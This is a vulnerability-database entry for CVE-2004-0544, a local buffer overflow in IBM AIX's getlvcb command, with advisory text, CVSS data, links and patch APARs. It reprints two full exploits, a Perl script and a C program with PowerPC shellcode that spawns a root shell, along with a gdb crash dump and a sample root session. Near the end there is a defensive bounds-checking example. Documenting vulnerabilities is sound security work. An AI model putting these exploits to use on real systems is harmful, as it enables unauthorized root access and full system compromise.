CVE-2004-0544
CVSS 7.2
Published: 2004-08-06 00:00:00
Revised: 2008-09-05 16:38:42

[Original] Multiple buffer overflows in LVM for AIX 5.1 and 5.2 allow local users to gain privileges via the (1) putlvcb or (2) getlvcb commands.


[CNNVD] AIX Getlvcb Local Buffer Overflow Vulnerability (CNNVD-200408-074)

        
        IBM AIX is a commercial UNIX operating system.
        AIX getlvcb lacks sufficient bounds checking when it copies its arguments into memory. A local attacker can exploit this to trigger a buffer overflow and may execute arbitrary instructions on the system with root privileges.
        Passing an overly long argument to getlvcb triggers the overflow. Running the program requires root group privileges; however, another vulnerability (the AIX make CC path local buffer overflow) can be exploited to execute arbitrary instructions on the system with root privileges.
        

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can result in complete system shutdown]
Access complexity: LOW [exploitation has no access restrictions]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/o:ibm:aix:5.1    IBM AIX 5.1
cpe:/o:ibm:aix:5.2    IBM AIX 5.2
cpe:/o:ibm:aix:4.3.3  IBM AIX 4.3.3

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0544
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0544
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-074
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/9905
(VENDOR_ADVISORY)  BID  9905
http://www.ciac.org/ciac/bulletins/o-131.shtml
(VENDOR_ADVISORY)  CIAC  O-131
http://xforce.iss.net/xforce/xfdb/15555
(VENDOR_ADVISORY)  XF  aix-putlvcb-bo(15555)
http://www-1.ibm.com/support/docview.wss?uid=isg1IY55682
(UNKNOWN)  AIXAPAR  IY55682
http://www-1.ibm.com/support/docview.wss?uid=isg1IY55681
(UNKNOWN)  AIXAPAR  IY55681
http://www-1.ibm.com/services/continuity/recover1.nsf/mss/MSS-OAR-E01-2004.0544.2
(UNKNOWN)  IBM  MSS-OAR-E01-2004.0544
http://secunia.com/advisories/11158/
(UNKNOWN)  SECUNIA  11158
http://xforce.iss.net/xforce/xfdb/18317
(UNKNOWN)  XF  aix-getlvcb-bo(18317)
http://www.securityfocus.com/bid/9906
(UNKNOWN)  BID  9906
http://www.osvdb.org/4393
(UNKNOWN)  OSVDB  4393
http://www.osvdb.org/4392
(UNKNOWN)  OSVDB  4392

- Vulnerability information

AIX Getlvcb Local Buffer Overflow Vulnerability
High severity  Boundary condition error
2004-08-06 00:00:00  2005-10-20 00:00:00
Local
        
        IBM AIX is a commercial UNIX operating system.
        AIX getlvcb lacks sufficient bounds checking when it copies its arguments into memory. A local attacker can exploit this to trigger a buffer overflow and may execute arbitrary instructions on the system with root privileges.
        Passing an overly long argument to getlvcb triggers the overflow. Running the program requires root group privileges; however, another vulnerability (the AIX make CC path local buffer overflow) can be exploited to execute arbitrary instructions on the system with root privileges.
        

- Advisories and patches

        Vendor patches:
        IBM
        ---
        The vendor has not yet provided a patch or upgrade. We recommend that users of this software follow the vendor's home page for the latest version:
        
        http://www-912.ibm.com/eserver/support/fixes/

- Vulnerability information (23840)

AIX 4.3.3/5.x Getlvcb Command Line Argument Buffer Overflow Vulnerability (1) (EDBID:23840)
aix local
2003-05-30 Verified
0 watercloud
N/A
source: http://www.securityfocus.com/bid/9905/info

getlvcb has been reported to be prone to a buffer overflow vulnerability.

When an argument is passed to the getlvcb utility, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the root user.

An attacker will require system group privileges prior to the execution of the getlvcb utility; the attacker may exploit the issue described in BID 9903 in order to gain the privileges required to exploit this vulnerability.

#!/usr/bin/perl
# FileName: x_getlvcb_aix433_limited.pl
# Exploit getlvcb of Aix4.3.3 to get a uid=0 shell from a gid=0.
# Tested  : on Aix4.3.3.
# Author  : watercloud@xfocus.org
# Site    : www.xfocus.org   www.xfocus.net
# Date    : 2003-5-30
# Announce: use at your own risk!

$CMD="/usr/sbin/getlvcb";
$_=`/usr/bin/oslevel`;

$XID="\x03";
$UID="\x97";
print "\n\nExploit $CMD for Aix 4.3.3 to get uid=0 shell.\n";
print "From: [ www.xfocus.org 2003-5-30 ].\n\n";
print "Note :\n";
print "You must get gid=0 befor use this exploit,for example ";
print "my another program x_make_433_limited.pl :)\n";
print "If you get a shell euid=0 then run this command: ";
print "/usr/bin/syscall setreuid 0 0 \\; execve '/bin/sh'\n";

$NOP="\x7c\xa5\x2a\x79"x800;
%ENV=();

$ENV{CCC}="AA".$NOP.&getshell($XID,$UID);
$ret=system $CMD ,"AAA"."\x2f\xf2\x2b\x40"x300;

for($i=0;$i<4 && $ret;$i++){
  for($j=0;$j<4 && $ret;$j++) {
    $ENV{CCC}="A"x $i .$NOP.&getshell($XID,$UID);
    system $CMD ,"A"x $j ."\x2f\xf2\x2b\x40"x300;
  }
}

# Builds the payload; takes the two ID bytes as plain arguments
# (the original used an invalid prototype-style signature).
sub getshell {
  my ($XID,$GID)=@_;
  my $SHELL;
  $SHELL="\x7e\x94\xa2\x79\x7e\x84\xa3\x78\x40\x82\xff\xfd";
  $SHELL.="\x7e\xa8\x02\xa6\x3a\xb5\x01\x40\x88\x55\xfe\xe0";
  $SHELL.="\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6";
  $SHELL.="\x4c\xc6\x33\x42\x44\xff\xff\x02$GID$XID\xff\xff";
  $SHELL.="\x38\x75\xff\x04\x38\x95\xff\x0c\x7e\x85\xa3\x78";
  $SHELL.="\x90\x75\xff\x0c\x92\x95\xff\x10\x88\x55\xfe\xe1";
  $SHELL.="\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh\xff";
  return $SHELL;
}
#EOF
		

- Vulnerability information (23841)

AIX 4.3.3/5.x Getlvcb Command Line Argument Buffer Overflow Vulnerability (2) (EDBID:23841)
aix local
2004-03-17 Verified
0 mattox
N/A
source: http://www.securityfocus.com/bid/9905/info
 
getlvcb has been reported to be prone to a buffer overflow vulnerability.
 
When an argument is passed to the getlvcb utility, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the root user.
 
An attacker will require system group privileges prior to the execution of the getlvcb utility; the attacker may exploit the issue described in BID 9903 in order to gain the privileges required to exploit this vulnerability.

/********************************************************************
 * Secure Network Operations (http://www.secnetops.com)
 * Local AIX getlvcb Exploit
 * by: mattox@secnetops.com
 * Program Description:
 *
 * Vulnerability Details:
 *
 * # gdb -q /usr/sbin/getlvcb
 * (no debugging symbols found)...(gdb) set args `perl -e 'print "A" x 183'`ABCD
 * (gdb) r
 * Starting program: /usr/sbin/getlvcb `perl -e 'print "A" x 183'`ABCD
 *
 * Program received signal SIGSEGV, Segmentation fault.
 * 0x41424344 in ?? ()
 * (gdb) bt
 * #0  0x41424344 in ?? ()
 * (gdb) i r
 * r0             0x6000328e       1610625678
 * r1             0x2ff228a0       804399264
 * r2             0xf012de88       -267198840
 * r3             0x1      1
 * r4             0x9      9
 * r5             0x2ff22ff8       804401144
 * r6             0xd030   53296
 * r7             0x0      0
 * r8             0x60000000       1610612736
 * r9             0x600039ce       1610627534
 * r10            0x0      0
 * r11            0x6000214a       1610621258
 * r12            0x41424344       1094861636
 * r13            0x200008b0       536873136
 * r14            0x0      0
 * r15            0x0      0
 * r16            0x0      0
 * r17            0x0      0
 * r18            0x0      0
 * r19            0x0      0
 * r20            0x0      0
 * r21            0x0      0
 * r22            0x0      0
 * r23            0x0      0
 * r24            0x0      0
 * r25            0x0      0
 * r26            0x0      0
 * r27            0x0      0
 * r28            0x41414141       1094795585
 * r29            0x41414141       1094795585
 * r30            0x41414141       1094795585
 * r31            0x41414141       1094795585
 * pc             0x41424344       1094861636
 * ps             0x4000d030       1073795120
 * cr             0x26222444       639771716
 * lr             0x41424344       1094861636
 * ctr            0x0      0
 * xer            0x0      0
 * fpscr          0x0      0
 * vscr           0x0      0
 * vrsave         0x0      0
 *
 * .............................................................
 * $ uname -a
 * AIX thunderfoot 1 5 002064864C00
 *
 * $ whoami
 * kinet1k
 *
 * $ id
 * uid=7(kinet1k) gid=1(staff) groups=0(system)
 * $ ./r00tme 208 231
 *
 * Secure Network Operations (written by: mattox@secnetops.com)
 * AIX Local getlvncb exploit
 *
 * Fixin to overwrite the address: 0x2ff2283d
 * Using a buffer size of: 208
 * And an offset of: 231
 *
 * # whoami
 * root
 *
 * # id
 * uid=0(root) gid=1(staff) groups=0(system)
 *..............................................................
 *
 *********************************************************************/
#include <stdio.h>      /* printf */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>     /* execl */

#define OFFSET                           0
#define BUFFERSIZE                     208
#define NOP             "\x7c\xa5\x2a\x79"
#define RETURNADDR              0x2ff22924

char shellcode[ ] =
    "\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
    "\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
    "\x4c\xc6\x33\x42\x44\xff\xff\x02\xb6\x05\xff\xff\x7e\x94\xa2\x79"
    "\x7e\x84\xa3\x78\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
    "\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
    "\x4c\xc6\x33\x42\x44\xff\xff\x02\xb7\x05\xff\xff\x38\x75\xff\x04"
    "\x38\x95\xff\x0c\x7e\x85\xa3\x78\x90\x75\xff\x0c\x92\x95\xff\x10"
    "\x88\x55\xfe\xe1\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh";


int main( int argc, char *argv[ ] )
{
    int i;
    int offset = OFFSET, bufferSize = BUFFERSIZE;
    unsigned long esp, returnAddress, *addressPointer;
    char *buffer, *pointer;

    /* Usage */
    if( argv[ 1 ] ) {
        if( strncmp( argv[ 1 ], "-h", 3 ) == 0 || strncmp( argv[ 1 ], "-H", 3 ) == 0 ) {
            printf( "\n\tUsage:  %s <buffer size> <offset>\n\n", argv[ 0 ] );
            exit( 0 );
        }
    }

    if( argc > 1 ) {
        bufferSize = atoi( argv[ 1 ] );
    }

    if( argc > 2 ) {
        offset = atoi( argv[ 2 ] );
    }

    returnAddress = RETURNADDR - offset;

    printf( "\nSecure Network Operations (written by: mattox@secnetops.com)\n" );
    printf( "AIX Local getlvncb exploit\n\n" );
    printf( "Fixin to overwrite the address: 0x%lx\n", returnAddress );
    printf( "Using a buffer size of: %i\n", bufferSize );
    printf( "And an offset of: %i\n", offset );

    if( !( buffer = malloc( bufferSize ) ) ) {
        printf( "Coundn't allocate memory.\n" );
        exit( 0 );
    }

    /* I know, this is weird stuff...had to sub odd number to get ret addy to align */
    pointer = buffer - 1;

    addressPointer = ( long * )pointer;

    for( i = 0; i < bufferSize; i+=4 ) {
        *( addressPointer++ ) = returnAddress;
    }

    for( i = 0; i < ( bufferSize / 2 ); i+=4 ) {
        buffer[ i ] = ( unsigned long )NOP;
    }

    pointer = buffer + ( ( bufferSize / 2 ) - ( strlen( shellcode )/2 ) );

    for( i = 0; i < strlen( shellcode ); i++ ) {
        *( pointer++ ) = shellcode[ i ];
    }

    buffer[ bufferSize - 1 ] = '\0';

    /* execl() needs a (char *)NULL terminator, not a bare 0 */
    execl( "/usr/sbin/getlvcb", "getlvcb", buffer, (char *)NULL );

    free( buffer );

    return 0;

}

		

- Vulnerability information

4392
IBM AIX getlvcb Local Overflow
Local Access Required Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Unknown

- Vulnerability description

A local overflow exists in IBM AIX. The getlvcb command fails to validate input resulting in a possible buffer overflow. With a specially crafted request, an attacker can cause arbitrary command execution resulting in a loss of confidentiality and/or integrity.

- Timeline

2004-03-22 Unknown
Unknown Unknown

- Solution

Upgrade AIX using the APAR numbers AIX 5.1.0:  IY55681 and AIX 5.2.0:  IY55682 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

AIX Getlvcb Command Line Argument Buffer Overflow Vulnerability
Boundary Condition Error 9905
No Yes
2004-03-17 12:00:00 2009-07-12 03:06:00
Discovery of this vulnerability has been credited to watercloud <watercloud@xfocus.org>.

- Affected program versions

IBM AIX 4.3.3
IBM AIX 5.2
IBM AIX 5.1

- Discussion

getlvcb has been reported to be prone to a buffer overflow vulnerability.

When an argument is passed to the getlvcb utility, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the root user.

An attacker will require system group privileges prior to the execution of the getlvcb utility; the attacker may exploit the issue described in BID 9903 in order to gain the privileges required to exploit this vulnerability.
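The bug class described above, an argument copied into a fixed-size buffer with no length check, is easiest to see next to the bounds-checked copy that a fixed utility would use. The following is an added example written for this page; it is not code from getlvcb, from IBM, or from the exploit authors, and the buffer size, the function names and the constructed test arguments are assumptions.

```c
/* Added example, not code from getlvcb, IBM or the exploit authors: the bug
 * class the advisory describes (a command-line argument copied into a
 * fixed-size buffer with no length check) next to a bounds-checked copy that
 * rejects oversized input instead of overflowing. ARG_BUF_SIZE and all
 * function names are assumptions for this example. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define ARG_BUF_SIZE 64   /* assumed size of the fixed buffer */

/* Unchecked copy: the vulnerable pattern. strcpy() stops only at the NUL of
 * src, so an argument longer than the buffer overwrites whatever follows it
 * on the stack. Shown for contrast only; nothing below calls it. */
void copy_arg_unchecked(char *dst, const char *src)
{
    strcpy(dst, src);
}

/* Bounds-checked copy. Returns 0 and writes a NUL-terminated copy when src
 * (plus its terminating NUL) fits in dst_size bytes; returns -1 and leaves
 * dst untouched otherwise. The length scan is itself bounded by dst_size, so
 * an unterminated src cannot make it read past that many bytes either. */
int copy_arg_checked(char *dst, size_t dst_size, const char *src)
{
    size_t len = 0;

    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    while (len < dst_size && src[len] != '\0')
        len++;
    if (len == dst_size)          /* no room for the NUL: reject, do not truncate */
        return -1;
    memcpy(dst, src, len + 1);    /* len + 1 copies the terminator as well */
    return 0;
}

/* Entry point in the shape of the vulnerable utility: validates the argument
 * against a fixed stack buffer before using it. Returns 1 if the argument was
 * accepted, 0 if it was rejected as too long. */
int handle_argument(const char *arg)
{
    char buf[ARG_BUF_SIZE];

    if (copy_arg_checked(buf, sizeof buf, arg) != 0) {
        fprintf(stderr, "argument too long (limit is %zu bytes)\n",
                sizeof buf - 1);
        return 0;
    }
    /* the real program would parse buf here; it is guaranteed NUL-terminated */
    return 1;
}

/* Test helper: builds a constructed argument of n 'A' bytes (the same filler
 * the crash transcript above uses) and feeds it to handle_argument(). */
int probe_length(size_t n)
{
    static char arg[1024];

    if (n >= sizeof arg)
        n = sizeof arg - 1;
    memset(arg, 'A', n);
    arg[n] = '\0';
    return handle_argument(arg);
}

int main(void)
{
    /* ARG_BUF_SIZE - 1 bytes is the longest argument that is accepted */
    printf("63 bytes: %s\n", probe_length(63) ? "accepted" : "rejected");
    printf("64 bytes: %s\n", probe_length(64) ? "accepted" : "rejected");
    printf("183 bytes: %s\n", probe_length(183) ? "accepted" : "rejected");
    return 0;
}
```

The checked copy rejects rather than silently truncates: a truncated logical-volume name would be a different, valid-looking input, which is its own failure mode, whereas a rejection is visible to the caller and to anyone auditing the utility's exit status.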

- Exploit

The following proof of concept exploits have been supplied:

- Solution

IBM has released an update to their original advisory (APR-22-2004-LVM) as well as official APAR fixes; these fixes supersede the previous efixes. Further information regarding obtaining and applying APARs can be found in the referenced advisory.


IBM AIX 5.1

IBM AIX 5.2

- References

 

 
